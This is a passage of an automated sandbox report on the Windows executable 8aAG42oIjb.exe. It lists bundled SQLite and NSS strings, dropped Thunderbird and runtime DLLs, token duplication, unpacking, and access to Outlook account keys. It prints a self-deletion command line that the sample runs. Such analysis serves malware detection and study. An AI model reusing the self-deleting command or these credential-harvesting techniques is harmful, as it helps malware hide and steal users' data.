Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_00438EA2 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,

0_2_00438EA2

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 8aAG42oIjb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: C:\cesuyerew\xebopepuy\vutugiwafotamu\purehuro_bef.pdb source: 8aAG42oIjb.exe
Source:	Binary string: BC:\cesuyerew\xebopepuy\vutugiwafotamu\purehuro_bef.pdb source: 8aAG42oIjb.exe
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 8aAG42oIjb.exe, 00000000.00000002.674339250.000000006E509000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 8aAG42oIjb.exe, 00000000.00000002.674339250.000000006E509000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Unpacked PE file: 0.2.8aAG42oIjb.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Unpacked PE file: 0.2.8aAG42oIjb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004000BB push edx; retf		0_2_004000C2
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_004407F0 push ecx; ret		0_2_00440803

Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc
Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

0_2_0042A2F9

Source: ucrtbase.dll.0.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.9738824165

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe'
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe'			Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

